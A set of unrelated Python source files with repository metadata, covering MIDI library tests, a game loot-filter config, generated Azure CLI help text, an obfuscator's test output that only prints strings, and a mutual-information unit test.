from mlprogram.nn.functional.bmm import bmm # noqa from mlprogram.nn.functional.embeddings import ( # noqa index_embeddings, position_embeddings, ) from mlprogram.nn.functional.gelu import gelu # noqa from mlprogram.nn.functional.utils import lne_to_nel, nel_to_lne # noqa

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a4917396d6ae967836576b7e9559b5a1fbdb1e5e

427

py

Python

package1/_package3/__init__.py

seahrh/package_demo.py

8a6485810d933b67ac576ffcbefe3be41b682389

[ "MIT" ]

null

package1/_package3/__init__.py

seahrh/package_demo.py

8a6485810d933b67ac576ffcbefe3be41b682389

[ "MIT" ]

null

package1/_package3/__init__.py

seahrh/package_demo.py

8a6485810d933b67ac576ffcbefe3be41b682389

[ "MIT" ]

null

__all__ = [] def bar_package3(): """This will always be exposed even if it is not included in `__all__`. """ pass def tin_package3(): """This will always be exposed even if it is not included in `__all__`. """ pass def _foo_package3(): """This will always be exposed even if it is not included in `__all__`. The name having one or two leading underscores does not matter. """ pass

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9

f110f30e9cab1becd6c5d9d40a6db80e2e7ed360

48

py

Python

clusterer/schedulers/__init__.py

kshitij12345/clusterer

d82742f14b9cfa45e017d5fc57f6df8b938cc5e5

[ "MIT" ]

12

2018-06-18T11:32:53.000Z

2022-03-05T02:16:28.000Z

clusterer/schedulers/__init__.py

kshitij12345/clusterer

d82742f14b9cfa45e017d5fc57f6df8b938cc5e5

[ "MIT" ]

1

2018-06-17T18:02:13.000Z

clusterer/schedulers/__init__.py

kshitij12345/clusterer

d82742f14b9cfa45e017d5fc57f6df8b938cc5e5

[ "MIT" ]

null

from .PipelineReplicate import PipelineReplicate

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7

f12846026c5b2c6a6faa5fd1228a56e12db1a2b4

534

py

Python

Documentation/matplotlib/users/whats_new-2.py

leesavide/pythonista-docs-deprecated

9ec3363f07e328bde0a58738a16907f11dfd06e1

[ "Apache-2.0" ]

16

2016-06-14T19:45:35.000Z

2020-11-30T19:02:58.000Z

Documentation/matplotlib/users/whats_new-2.py

leesavide/pythonista-docs

9ec3363f07e328bde0a58738a16907f11dfd06e1

[ "Apache-2.0" ]

1

2016-06-15T07:10:27.000Z

Documentation/matplotlib/users/whats_new-2.py

leesavide/pythonista-docs

9ec3363f07e328bde0a58738a16907f11dfd06e1

[ "Apache-2.0" ]

null

plt.rcParams['savefig.facecolor'] = "0.8" plt.rcParams['figure.figsize'] = 4, 3 fig, axes_list = plt.subplots(2, 1) for ax in axes_list.flat: ax.set(xlabel="x-label", ylabel="y-label", title="before tight_layout") ax.locator_params(nbins=3) plt.show() plt.rcParams['savefig.facecolor'] = "0.8" plt.rcParams['figure.figsize'] = 4, 3 fig, axes_list = plt.subplots(2, 1) for ax in axes_list.flat: ax.set(xlabel="x-label", ylabel="y-label", title="after tight_layout") ax.locator_params(nbins=3) plt.tight_layout() plt.show()

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null

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7

f15ab3cc2b3d9e7d545158e32d528a9f95d1c4c3

5,503

py

Python

tests/test_subs_query.py

Jajcus/python-alsa-midi

1747fc85482b747f96e2ae3e9c8fe4f2c39a9391

[ "MIT" ]

4

2022-01-26T22:33:11.000Z

2022-03-21T18:05:26.000Z

tests/test_subs_query.py

Jajcus/python-alsa-midi

1747fc85482b747f96e2ae3e9c8fe4f2c39a9391

[ "MIT" ]

1

2022-01-27T21:01:18.000Z

2022-01-29T17:21:17.000Z

tests/test_subs_query.py

Jajcus/python-alsa-midi

1747fc85482b747f96e2ae3e9c8fe4f2c39a9391

[ "MIT" ]

1

2021-12-26T16:59:13.000Z

import errno import pytest from alsa_midi import Address, ALSAError, SequencerClient, SubscriptionQuery, SubscriptionQueryType @pytest.mark.require_alsa_seq def test_query_port_subscribers_bad_addr(alsa_seq_state): client = SequencerClient("test") alsa_seq_state.load() assert (99, 99) not in alsa_seq_state.ports query = SubscriptionQuery(Address(99, 99), SubscriptionQueryType.READ) with pytest.raises(ALSAError) as err: client.query_port_subscribers(query) assert err.value.errnum == -errno.ENXIO client.close() @pytest.mark.require_alsa_seq def test_query_port_subscribers(): client = SequencerClient("test") p1 = client.create_port("p1") p2 = client.create_port("p2") other_client = SequencerClient("other") other_p1 = other_client.create_port("p1") other_p2 = other_client.create_port("p2") p1.connect_to(other_p1) p1.connect_from(other_p2) p2.connect_from(other_p1) p2.connect_from(other_p2) query = SubscriptionQuery(p1, SubscriptionQueryType.READ) sub = client.query_port_subscribers(query) assert sub.root == Address(p1) assert sub.type == SubscriptionQueryType.READ assert sub.index == 0 assert sub.addr == Address(other_p1) assert sub.num_subs == 1 assert sub.queue_id == 0 assert sub.exlusive is False assert sub.time_update is False assert sub.time_real is False query.index += 1 with pytest.raises(ALSAError) as exc: client.query_port_subscribers(query) assert exc.value.errnum == -errno.ENOENT query = SubscriptionQuery(p1, SubscriptionQueryType.WRITE) sub = client.query_port_subscribers(query) assert sub.root == Address(p1) assert sub.type == SubscriptionQueryType.WRITE assert sub.index == 0 assert sub.addr == Address(other_p2) assert sub.num_subs == 1 assert sub.queue_id == 0 assert sub.exlusive is False assert sub.time_update is False assert sub.time_real is False query.index += 1 with pytest.raises(ALSAError) as exc: client.query_port_subscribers(query) assert exc.value.errnum == -errno.ENOENT query = SubscriptionQuery(p2, SubscriptionQueryType.READ) with pytest.raises(ALSAError) as exc: client.query_port_subscribers(query) assert exc.value.errnum == -errno.ENOENT query = SubscriptionQuery(p2, SubscriptionQueryType.WRITE) sub = client.query_port_subscribers(query) assert sub.root == Address(p2) assert sub.type == SubscriptionQueryType.WRITE assert sub.index == 0 assert sub.addr == Address(other_p1) assert sub.num_subs == 2 assert sub.queue_id == 0 assert sub.exlusive is False assert sub.time_update is False assert sub.time_real is False query.index += 1 sub = client.query_port_subscribers(query) assert sub.root == Address(p2) assert sub.type == SubscriptionQueryType.WRITE assert sub.index == 1 assert sub.addr == Address(other_p2) assert sub.num_subs == 2 assert sub.queue_id == 0 assert sub.exlusive is False assert sub.time_update is False assert sub.time_real is False query.index += 1 with pytest.raises(ALSAError) as exc: client.query_port_subscribers(query) assert exc.value.errnum == -errno.ENOENT client.close() other_client.close() @pytest.mark.require_alsa_seq def test_list_port_subscribers_bad_addr(alsa_seq_state): client = SequencerClient("test") alsa_seq_state.load() assert (99, 99) not in alsa_seq_state.ports assert client.list_port_subscribers(Address(99, 99)) == [] client.close() @pytest.mark.require_alsa_seq def test_list_port_subscribers(): client = SequencerClient("test") p1 = client.create_port("p1") p2 = client.create_port("p2") other_client = SequencerClient("other") other_p1 = other_client.create_port("p1") other_p2 = other_client.create_port("p2") p1.connect_to(other_p1) p1.connect_from(other_p2) p2.connect_from(other_p1) p2.connect_from(other_p2) subs = client.list_port_subscribers(p1) assert len(subs) == 2 sub = subs[0] assert sub.root == Address(p1) assert sub.type == SubscriptionQueryType.READ assert sub.addr == Address(other_p1) assert sub.queue_id == 0 assert sub.exlusive is False assert sub.time_update is False assert sub.time_real is False sub = subs[1] assert sub.root == Address(p1) assert sub.type == SubscriptionQueryType.WRITE assert sub.index == 0 assert sub.addr == Address(other_p2) assert sub.num_subs == 1 assert sub.queue_id == 0 assert sub.exlusive is False assert sub.time_update is False assert sub.time_real is False subs = p2.list_subscribers(SubscriptionQueryType.READ) assert subs == [] subs = p2.list_subscribers(SubscriptionQueryType.WRITE) assert len(subs) == 2 sub = subs[0] assert sub.root == Address(p2) assert sub.type == SubscriptionQueryType.WRITE assert sub.addr == Address(other_p1) assert sub.queue_id == 0 assert sub.exlusive is False assert sub.time_update is False assert sub.time_real is False sub = subs[1] assert sub.root == Address(p2) assert sub.type == SubscriptionQueryType.WRITE assert sub.addr == Address(other_p2) assert sub.queue_id == 0 assert sub.exlusive is False assert sub.time_update is False assert sub.time_real is False client.close() other_client.close()

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8

7ae604d711d3223ae9718ac4ea216a8512eb9bc0

4,923

py

Python

item_config/recipe_item.py

xanthics/poe_filter

d01bc823f97e247ebdf2921b86b720e2b6edc673

[ "MIT" ]

4

2016-05-03T17:49:13.000Z

2019-03-30T03:22:40.000Z

item_config/recipe_item.py

xanthics/poe_filter

d01bc823f97e247ebdf2921b86b720e2b6edc673

[ "MIT" ]

2

2016-05-03T09:07:52.000Z

2018-12-24T08:47:12.000Z

item_config/recipe_item.py

xanthics/poe_filter

d01bc823f97e247ebdf2921b86b720e2b6edc673

[ "MIT" ]

1

2018-11-21T15:54:08.000Z

#!/usr/bin/python # -*- coding: utf-8 -*- # Author: Jeremy Parks # Note: Requires Python 3.3.x or higher desc = "Recipe Item" # Base type : settings pair items = { # toogle between 'ignore' or 'recipe item normal' "0 rare hammers q>=16": {"base": "Stone Hammer\" \"Rock Breaker\" \"Gavel", "other": ["Rarity Rare", "Quality >= 16"], "type": "ignore"}, "0 magic hammers q>=12": {"base": "Stone Hammer\" \"Rock Breaker\" \"Gavel", "other": ["Rarity Magic", "Quality >= 12"], "type": "ignore"}, "0 normal hammers": {"base": "Stone Hammer\" \"Rock Breaker\" \"Gavel", "other": ["Rarity Normal"], "type": "ignore"}, # Chaos Orb Rare highlighting for currency recipes. change 'ignore' to 'recipe item rare small' or back as needed "1 Chaos Rare Two Hand": {"class": "Two Hand\" \"Staves\" \"Bow", "other": ["Height 4", "Width 2", "Rarity Rare", "ItemLevel >= 60", "ItemLevel <= 74", "Identified False"], "type": "ignore"}, "1 Chaos Rare Helm": {"class": "Helmets", "other": ["Rarity Rare", "ItemLevel >= 60", "ItemLevel <= 74", "Identified False"], "type": "ignore"}, "1 Chaos Rare Body": {"class": "Body Armours", "other": ["Rarity Rare", "ItemLevel >= 60", "ItemLevel <= 74", "Identified False"], "type": "ignore"}, "1 Chaos Rare Glove": {"class": "Gloves", "other": ["Rarity Rare", "ItemLevel >= 60", "ItemLevel <= 74", "Identified False"], "type": "ignore"}, "1 Chaos Rare Boot": {"class": "Boots", "other": ["Rarity Rare", "ItemLevel >= 60", "ItemLevel <= 74", "Identified False"], "type": "ignore"}, "1 Chaos Rare Amulet": {"class": "Amulet", "other": ["Rarity Rare", "ItemLevel >= 60", "ItemLevel <= 74", "Identified False"], "type": "ignore"}, "1 Chaos Rare Ring": {"class": "Ring", "other": ["Rarity Rare", "ItemLevel >= 60", "ItemLevel <= 74", "Identified False"], "type": "ignore"}, "1 Chaos Rare Belt": {"class": "Belt", "other": ["Rarity Rare", "ItemLevel >= 60", "ItemLevel <= 74", "Identified False"], "type": "ignore"}, # "1 wand": {"baseexact": "Opal Wand", "class": "Wand", "other": ["ItemLevel >= 84"], "type": "show normal quiet"}, #"1 crucible item": {"class": "amulet", "type": "low"}, # Regal Orb Rare highlighting for currency recipes. change 'ignore' to 'recipe item rare small' or back as needed "1 Regal Rare Two Hand": {"class": "Two Hand\" \"Staves\" \"Bow", "other": ["Height 4", "Width 2", "Rarity Rare", "ItemLevel >= 75", "Identified False"], "type": "ignore"}, "1 Regal Rare Helm": {"class": "Helmets", "other": ["Rarity Rare", "ItemLevel >= 75", "Identified False"], "type": "ignore"}, "1 Regal Rare Body": {"class": "Body Armours", "other": ["Rarity Rare", "ItemLevel >= 75", "Identified False"], "type": "ignore"}, "1 Regal Rare Glove": {"class": "Gloves", "other": ["Rarity Rare", "ItemLevel >= 75", "Identified False"], "type": "ignore"}, "1 Regal Rare Boot": {"class": "Boots", "other": ["Rarity Rare", "ItemLevel >= 75", "Identified False"], "type": "ignore"}, "1 Regal Rare Amulet": {"class": "Amulet", "other": ["Rarity Rare", "ItemLevel >= 75", "Identified False"], "type": "ignore"}, "1 Regal Rare Ring": {"class": "Ring", "other": ["Rarity Rare", "ItemLevel >= 75", "Identified False"], "type": "ignore"}, "1 Regal Rare Belt": {"class": "Belt", "other": ["Rarity Rare", "ItemLevel >= 75", "Identified False"], "type": "ignore"}, # NOTE: also has autogenerated rules # Exalted Shard highlighting for currency recipes. change 'ignore' to 'recipe item rare small' or back as needed "1 Exalted Shard Rare Two Hand": {"class": "Two Hand\" \"Staves\" \"Bow", "other": ["HasInfluence Crusader Elder Hunter Redeemer Shaper Warlord", "Height 4", "Width 2", "Rarity Rare", "Identified False"], "type": "ignore"}, "1 Exalted Shard Rare Helm": {"class": "Helmets", "other": ["HasInfluence Crusader Elder Hunter Redeemer Shaper Warlord", "Rarity Rare", "Identified False"], "type": "ignore"}, "1 Exalted Shard Rare Body": {"class": "Body Armours", "other": ["HasInfluence Crusader Elder Hunter Redeemer Shaper Warlord", "Rarity Rare", "Identified False"], "type": "ignore"}, "1 Exalted Shard Rare Glove": {"class": "Gloves", "other": ["HasInfluence Crusader Elder Hunter Redeemer Shaper Warlord", "Rarity Rare", "Identified False"], "type": "ignore"}, "1 Exalted Shard Rare Boot": {"class": "Boots", "other": ["HasInfluence Crusader Elder Hunter Redeemer Shaper Warlord", "Rarity Rare", "Identified False"], "type": "ignore"}, "1 Exalted Shard Rare Amulet": {"class": "Amulet", "other": ["HasInfluence Crusader Elder Hunter Redeemer Shaper Warlord", "Rarity Rare", "Identified False"], "type": "ignore"}, "1 Exalted Shard Rare Ring": {"class": "Ring", "other": ["HasInfluence Crusader Elder Hunter Redeemer Shaper Warlord", "Rarity Rare", "Identified False"], "type": "ignore"}, "1 Exalted Shard Rare Belt": {"class": "Belt", "other": ["HasInfluence Crusader Elder Hunter Redeemer Shaper Warlord", "Rarity Rare", "Identified False"], "type": "ignore"}, }

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bb0ddc05aa8a51c447f0898e3bb89cc4d595876d

10,843

py

Python

src/test/scenarios/managed-network/output/src/managed-network/azext_managed_network/generated/_help.py

changlong-liu/autorest.az

d6a85324b2849f65ccfef872d0ecb44eb28e16a0

[ "MIT" ]

null

src/test/scenarios/managed-network/output/src/managed-network/azext_managed_network/generated/_help.py

changlong-liu/autorest.az

d6a85324b2849f65ccfef872d0ecb44eb28e16a0

[ "MIT" ]

null

src/test/scenarios/managed-network/output/src/managed-network/azext_managed_network/generated/_help.py

changlong-liu/autorest.az

d6a85324b2849f65ccfef872d0ecb44eb28e16a0

[ "MIT" ]

null

# coding=utf-8 # -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- # pylint: disable=too-many-lines # pylint: disable=line-too-long from knack.help_files import helps # pylint: disable=unused-import helps['managed-network managed-network'] = """ type: group short-summary: managed-network managed-network """ helps['managed-network managed-network list'] = """ type: command short-summary: The ListBySubscription ManagedNetwork operation retrieves all the Managed Network Resources in the current subscription in a paginated format. examples: - name: Get Managed Network text: |- az managed-network managed-network list """ helps['managed-network managed-network show'] = """ type: command short-summary: The Get ManagedNetworks operation gets a Managed Network Resource, specified by the resource group and Managed Network name examples: - name: Get Managed Network text: |- az managed-network managed-network show --managed-network-name "myManagedNetwork" \\ --resource-group "myResourceGroup" """ helps['managed-network managed-network create'] = """ type: command short-summary: The Put ManagedNetworks operation creates/updates a Managed Network Resource, specified by resource group and Managed Network name examples: - name: Create/Update Managed Network text: |- az managed-network managed-network create --location "eastus" --managed-network-name \\ "myManagedNetwork" --resource-group "myResourceGroup" """ helps['managed-network managed-network update'] = """ type: command short-summary: Updates the specified Managed Network resource tags. examples: - name: Create/Update Managed Network text: |- az managed-network managed-network update --managed-network-name "myManagedNetwork" \\ --resource-group "myResourceGroup" """ helps['managed-network managed-network delete'] = """ type: command short-summary: The Delete ManagedNetworks operation deletes a Managed Network Resource, specified by the resource group and Managed Network name examples: - name: Delete Managed Network text: |- az managed-network managed-network delete --managed-network-name "myManagedNetwork" \\ --resource-group "myResourceGroup" """ helps['managed-network scope-assignment'] = """ type: group short-summary: managed-network scope-assignment """ helps['managed-network scope-assignment list'] = """ type: command short-summary: Get the specified scope assignment. examples: - name: Create/Update Managed Network text: |- az managed-network scope-assignment list --scope "subscriptions/subscriptionC" """ helps['managed-network scope-assignment show'] = """ type: command short-summary: Get the specified scope assignment. examples: - name: Create/Update Managed Network text: |- az managed-network scope-assignment show --scope "subscriptions/subscriptionC" \\ --scope-assignment-name "subscriptionCAssignment" """ helps['managed-network scope-assignment create'] = """ type: command short-summary: Creates a scope assignment. examples: - name: Create/Update Managed Network text: |- az managed-network scope-assignment create --assigned-managed-network "/subscriptions/subs criptionA/resourceGroups/myResourceGroup/providers/Microsoft.ManagedNetwork/managedNetwork s/myManagedNetwork" --scope "subscriptions/subscriptionC" --scope-assignment-name \\ "subscriptionCAssignment" """ helps['managed-network scope-assignment update'] = """ type: command short-summary: Creates a scope assignment. examples: - name: Create/Update Managed Network text: |- az managed-network scope-assignment create --assigned-managed-network "/subscriptions/subs criptionA/resourceGroups/myResourceGroup/providers/Microsoft.ManagedNetwork/managedNetwork s/myManagedNetwork" --scope "subscriptions/subscriptionC" --scope-assignment-name \\ "subscriptionCAssignment" """ helps['managed-network scope-assignment delete'] = """ type: command short-summary: Deletes a scope assignment. examples: - name: Create/Update Managed Network text: |- az managed-network scope-assignment delete --scope "subscriptions/subscriptionC" \\ --scope-assignment-name "subscriptionCAssignment" """ helps['managed-network managed-network-group'] = """ type: group short-summary: managed-network managed-network-group """ helps['managed-network managed-network-group list'] = """ type: command short-summary: The ListByManagedNetwork ManagedNetworkGroup operation retrieves all the Managed Network Groups in a specified Managed Networks in a paginated format. examples: - name: Get Managed Network Group text: |- az managed-network managed-network-group list --managed-network-name "myManagedNetwork" \\ --resource-group "myResourceGroup" """ helps['managed-network managed-network-group show'] = """ type: command short-summary: The Get ManagedNetworkGroups operation gets a Managed Network Group specified by the resource group, Managed Network name, and group name examples: - name: Get Managed Network Group text: |- az managed-network managed-network-group show --managed-network-group-name \\ "myManagedNetworkGroup1" --managed-network-name "myManagedNetwork" --resource-group \\ "myResourceGroup" """ helps['managed-network managed-network-group create'] = """ type: command short-summary: The Put ManagedNetworkGroups operation creates or updates a Managed Network Group resource examples: - name: Create/Update Managed Network Group text: |- az managed-network managed-network-group create --managed-network-group-name \\ "myManagedNetworkGroup1" --managed-network-name "myManagedNetwork" --resource-group \\ "myResourceGroup" """ helps['managed-network managed-network-group update'] = """ type: command short-summary: The Put ManagedNetworkGroups operation creates or updates a Managed Network Group resource examples: - name: Create/Update Managed Network Group text: |- az managed-network managed-network-group create --managed-network-group-name \\ "myManagedNetworkGroup1" --managed-network-name "myManagedNetwork" --resource-group \\ "myResourceGroup" """ helps['managed-network managed-network-group delete'] = """ type: command short-summary: The Delete ManagedNetworkGroups operation deletes a Managed Network Group specified by the resource group, Managed Network name, and group name examples: - name: Delete Managed Network Group text: |- az managed-network managed-network-group delete --managed-network-group-name \\ "myManagedNetworkGroup1" --managed-network-name "myManagedNetwork" --resource-group \\ "myResourceGroup" """ helps['managed-network managed-network-peering-policy'] = """ type: group short-summary: managed-network managed-network-peering-policy """ helps['managed-network managed-network-peering-policy list'] = """ type: command short-summary: The ListByManagedNetwork PeeringPolicies operation retrieves all the Managed Network Peering Policies in a specified Managed Network, in a paginated format. examples: - name: Get Managed Network Group text: |- az managed-network managed-network-peering-policy list --managed-network-name \\ "myManagedNetwork" --resource-group "myResourceGroup" """ helps['managed-network managed-network-peering-policy show'] = """ type: command short-summary: The Get ManagedNetworkPeeringPolicies operation gets a Managed Network Peering Policy resource, specified by the resource group, Managed Network name, and peering policy name examples: - name: Get Managed Network Peering Policy text: |- az managed-network managed-network-peering-policy show --managed-network-name \\ "myManagedNetwork" --managed-network-peering-policy-name "myHubAndSpoke" --resource-group \\ "myResourceGroup" """ helps['managed-network managed-network-peering-policy create'] = """ type: command short-summary: The Put ManagedNetworkPeeringPolicies operation creates/updates a new Managed Network Peering Policy examples: - name: Create/Update Managed Network Peering Policy text: |- az managed-network managed-network-peering-policy create --managed-network-name \\ "myManagedNetwork" --managed-network-peering-policy-name "myHubAndSpoke" --resource-group \\ "myResourceGroup" """ helps['managed-network managed-network-peering-policy update'] = """ type: command short-summary: The Put ManagedNetworkPeeringPolicies operation creates/updates a new Managed Network Peering Policy examples: - name: Create/Update Managed Network Peering Policy text: |- az managed-network managed-network-peering-policy create --managed-network-name \\ "myManagedNetwork" --managed-network-peering-policy-name "myHubAndSpoke" --resource-group \\ "myResourceGroup" """ helps['managed-network managed-network-peering-policy delete'] = """ type: command short-summary: The Delete ManagedNetworkPeeringPolicies operation deletes a Managed Network Peering Policy, specified by the resource group, Managed Network name, and peering policy name examples: - name: Get Managed Network Peering Policy text: |- az managed-network managed-network-peering-policy delete --managed-network-name \\ "myManagedNetwork" --managed-network-peering-policy-name "myHubAndSpoke" --resource-group \\ "myResourceGroup" """

44.991701

195

0.661348

1,074

10,843

6.675978

0.095903

0.29484

0.105439

0.140586

0.904184

0.841702

0.798047

0.738354

0.704603

0.702092

0

0.000598

0.22918

10,843

240

196

45.179167

0.857263

0.040579

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0.948198

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0

1

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true

0

0.004831

0

0.004831

0

null

1

0

1

0

1

0

1

0

null

0

1

0

10

bb21af03f997f10c2df66d5beb4e359516c50d4b

4,123

py

Python

tests/obf/variable_with_numbers_obf.py

zevtyardt/no-strint

47583d55e3c4cd12f00f46902d2fd7d5138c3275

[ "MIT" ]

13

2019-03-13T04:14:45.000Z

2020-04-05T09:13:21.000Z

tests/obf/variable_with_numbers_obf.py

CiKu370/no-strint

4f4fbe71517b84c00abd4fbdee15bacba01c0079

[ "MIT" ]

null

tests/obf/variable_with_numbers_obf.py

CiKu370/no-strint

4f4fbe71517b84c00abd4fbdee15bacba01c0079

[ "MIT" ]

6

2019-03-22T04:48:59.000Z

2020-08-07T17:09:20.000Z

n7 = ((lambda:(({}==())+({}<{}))).func_code.co_lnotab).join(map(chr,[(((((((((([]>{})+([]!=())+({}<=())))<<((([]==[])+({}!=()))))+((([]>=[])-([]>())))))))<<((([]==[])+([]<())+(()!=[]))))),((((((((()>{})+({}!=())+(()!=[])))<<(((()<=())+([]!={})+(()>[]))))+(((()<=())-([]<[])))))<<((([]>={})+({}>={}))))+((({}=={})+(()=={})))),(((((((({}!=[])+({}!=())+({}<()))+(({}=={})+([]>{})+({}<()))+(({}<[])*(()>=[])))<<((([]>=[])+(()>=[]))))-(((()>={})-({}==())))))<<((({}!=[])+({}<()))))),((((((((()>{})+({}>={})+({}!=()))+(([]>={})+(()>=())+(()!=[]))+((()>{})-({}==[])))<<(((()<=())+([]<()))))-((({}>[])+([]>{})))))<<((({}>={})+([]==[]))))),(((((()!={})+({}<={})+([]!={}))+(([]<())+({}!=[])+([]<()))+((()!=[])-({}==[])))<<((([]!={})+([]>={}))+(({}<[])+({}<=[]))))-((([]!=[])+([]!={}))))])) n86 = ((lambda:(({}==())*([]>=()))).func_code.co_lnotab).join(map(chr,[(((((((({}<=[])*({}!=())))<<((({}>={})+(()>=[]))+(({}<())+(()>=()))))-((({}<=[])+([]>())))))<<(((()>={})+({}=={})+({}<[]))))-((([]!={})+({}>{})))),((((([]!={})+(()<=())+(()>=()))+(([]>{})+(()!=[])+([]>={}))+((()>={})+({}==[])))<<(((()>=[])+({}>={}))+((()!={})+(()==()))))-(((()<=())-({}>{})))),(((((()==())+({}<=())+({}!=[]))+((()>={})+([]>=[])+({}<[]))+((()!={})*([]!=())))<<((([]==[])+({}<=[]))+(({}<())+([]<=()))))+(((({}>=[])+([]==[])))<<(((()>[])+([]<{}))))),((((((((()>[])+({}<())+(()>=[]))+(({}>={})+(()<=())+(()>=()))+(([]>=())+(()>={})))<<((({}!=[])+({}>={}))))-((([]>={})*(()>=[])))))<<((({}<={})+(()!=[]))))),(((((((({}=={})+(()>[])+([]==[])))<<((([]>={})+(()>[])+({}<=[]))))+((([]>={})-(()<{})))))<<((({}<[])+({}<=[]))))),((((({}!=[])+([]>={})+(()>={}))+((()==())+({}<={})+({}=={}))+(([]!={})*(()<=())))<<((([]<())+(()==()))+(([]<())+([]==[]))))+((({}<[])+({}<=[])+({}<={}))))])) n0283929382 = ((lambda:(([]>())+(()<=[]))).func_code.co_lnotab).join(map(chr,[((((([]<=())+({}<{})))<<((({}!=[])+(()!=[]))+(([]>{})+(()>=()))+(({}<())-(()=={}))))+(((()<=[])+({}!=[])))),((((({}<())-({}<{})))<<(((()>=[])+(()>=()))+((()>=())+({}<[]))+((()==())+({}>=()))))+((({}<[])+([]==()))))])) if ((((((((((()<=())+([]<())+(()!=[])))<<(((()>=())+(()!={}))))+((({}>{})+([]>={})))))))<<(((()<=())*({}<={}))))) < ((((([]>=[])+({}<[]))+((()!={})+(()>={}))+((()=={})+({}<())))<<(((()!={})+([]!=()))+(({}<={})+([]>=[]))))+((([]>{})+({}<{})))): ((lambda:((()>[])*([]<[]))).func_code.co_lnotab).join(map(chr,[(((((()!={})+([]<()))+(({}>={})+(()>=()))+((()<())+({}=={})))<<((({}<())+([]<=()))+(([]>{})+([]==[]))))-((([]<=())-(()<())))),(((((((([]>=[])*([]>{})))<<((([]>{})+(()>[]))+(([]!=())+(()==()))))-(((()>={})*(()!=[])))))<<(((()>{})+([]<())+([]!={}))))-(((({}<=[])-(()!=())))<<(((()>={})+([]<{}))))),((((({}<=())+([]>=[])+({}<={}))+(({}<={})+([]<=())+([]<()))+(([]<=())+({}==[])))<<((({}!=[])+({}>={}))+((()>=[])+(()>{}))))-(((([]>[])+({}=={})))<<((({}>={})+([]>()))))),(((((((({}<[])+(()==())+({}!=())))<<(((()>[])+([]>{})+({}=={}))))+((([]!={})-(()==[])))))<<(((()>={})+([]<()))))),(((((((([]==[])*({}!=[])))<<((([]>=[])+(()>=[]))+((()==())+(()>=()))))-((([]==[])+([]<[])))))<<((({}>={})+([]>={})+({}<={}))))-((([]==[])+([]<=[])+({}<[])))),(((((((((({}!=())+({}=={})+([]==[])))<<((({}<())+({}>={}))))-(((()>=[])-({}>[])))))))<<((({}<=[])+({}!=())+(()!=[]))))+((({}!={})+({}<={})))),(((((()>[])-({}!={})))<<(((()!={})+(()>={})+(()==()))+((()>=())+({}<[])+(()>={}))))+(((({}!=())+([]>=())))<<((([]=={})+(()!={}))))),((((((((()==())*({}<())))<<((({}<=())+(()>{}))+((()>[])+(()<=()))))-((([]==[])*([]>{})))))<<((({}=={})+({}<={})+({}<={}))))+(((([]!=())*(()>={})))<<((({}=={})-({}>()))))),(((((((({}>[])+({}<[])))<<((([]!={})+({}>={}))+(([]!={})+(()!={}))))+((([]!=[])+(()>=())))))<<((([]!={})+({}!=()))))),(((((((({}=={})+(()>())))<<(((()==())+([]>=[]))+(([]!={})+({}!=()))))-((([]!=())*({}!=[])))))<<(((()==())+(()>[])+(()==()))))-(((([]<[])+(()!={})))<<((({}==[])+({}=={}))))),((((((((()==())+(()>[])+([]<=[])))<<((([]==[])+(()>={})+({}<={}))))+((([]>())+(()!=[])))))<<((({}<())+({}<=[]))))),(((((((({}<())+(()<{})))<<((({}<())+([]!={}))+(({}!=[])+([]<()))))-((([]!={})+({}>())))))<<((([]==[])+([]>={})+({}!=[]))))+(((({}<={})+(()<{})))<<((([]>())+([]>{})))))])) print n0283929382

824.6

2,066

0.041232

38

4,123

4.263158

0.342105

0.246914

0.345679

0.395062

0.790123

0

0.005599

0.003638

4,123

5

2,067

824.6

0.033836

0

null

0

null

0.2

0

null

1

0

1

0

1

0

null

0

1

0

11

bb2780d4b1cd0a265f20d333d71294810e81c41b

194

py

Python

gin/deterministic/__init__.py

choderalab/gin

9082431d8b664699a898c1e2fa490a18737d6e2d

[ "MIT" ]

24

2019-07-20T22:37:09.000Z

2021-07-07T07:13:56.000Z

gin/deterministic/__init__.py

choderalab/gin

9082431d8b664699a898c1e2fa490a18737d6e2d

[ "MIT" ]

3

2021-05-10T05:29:59.000Z

2022-02-10T00:15:05.000Z

gin/deterministic/__init__.py

kuano-ai/gimlet

9082431d8b664699a898c1e2fa490a18737d6e2d

[ "MIT" ]

8

2019-08-09T17:30:20.000Z

2021-12-01T13:27:46.000Z

import gin.deterministic.conformer import gin.deterministic.forcefields import gin.deterministic.hydrogen import gin.deterministic.typing import gin.deterministic.md import gin.deterministic.mm

27.714286

36

0.876289

24

194

7.083333

0.375

0.317647

0.776471

0

0.061856

194

6

37

32.333333

0.934066

0

1

0

true

0

1

0

1

0

1

0

null

1

0

1

0

null

0

1

0

1

0

1

0

7

24d6282773b9968e10a72a94d62f519467c722d2

6,651

py

Python

haychecker/_test/chc/mutual_info_test.py

fruttasecca/hay_checker

2bbf4e8e90e0abc590dd74080fb6e4f445056354

[ "MIT" ]

2

2019-05-22T08:24:38.000Z

2020-12-04T13:36:30.000Z

haychecker/_test/chc/mutual_info_test.py

fruttasecca/hay_checker

2bbf4e8e90e0abc590dd74080fb6e4f445056354

[ "MIT" ]

null

haychecker/_test/chc/mutual_info_test.py

fruttasecca/hay_checker

2bbf4e8e90e0abc590dd74080fb6e4f445056354

[ "MIT" ]

3

2018-09-15T13:40:40.000Z

2021-06-29T23:31:18.000Z

import random import unittest import numpy as np import pandas as pd from sklearn.metrics import mutual_info_score from haychecker.chc.metrics import mutual_info class TestMutualInfo(unittest.TestCase): def mi(self, df, x, y): index = (df[x].isna()) | (df[y].isna()) index = ~index if sum(index) > 0: return mutual_info_score(df[x][index], df[y][index]) else: return 0 def test_empty(self): df = pd.DataFrame() df["c1"] = [] df["c2"] = [] r1 = mutual_info(0, 1, df)[0] self.assertEqual(r1, 0.) def test_allnull(self): df = pd.DataFrame() df["c1"] = [None for i in range(100)] df["c2"] = [np.NaN for i in range(100)] pmi = self.mi(df, "c1", "c2") r = mutual_info(0, 1, df)[0] self.assertEqual(r, pmi) r = mutual_info(1, 0, df)[0] self.assertEqual(r, pmi) def test_allequal(self): df = pd.DataFrame() df["c1"] = [chr(0) for _ in range(100)] df["c2"] = [1 for _ in range(100)] pmi = self.mi(df, "c1", "c2") r = mutual_info(0, 1, df)[0] self.assertEqual(r, pmi) r = mutual_info(1, 0, df)[0] self.assertEqual(r, pmi) def test_halfnull_halfequal(self): df = pd.DataFrame() c1 = [chr(1) for _ in range(50)] c2 = [2 for _ in range(50)] c1.extend([None for _ in range(50)]) c2.extend([np.NaN for _ in range(50)]) 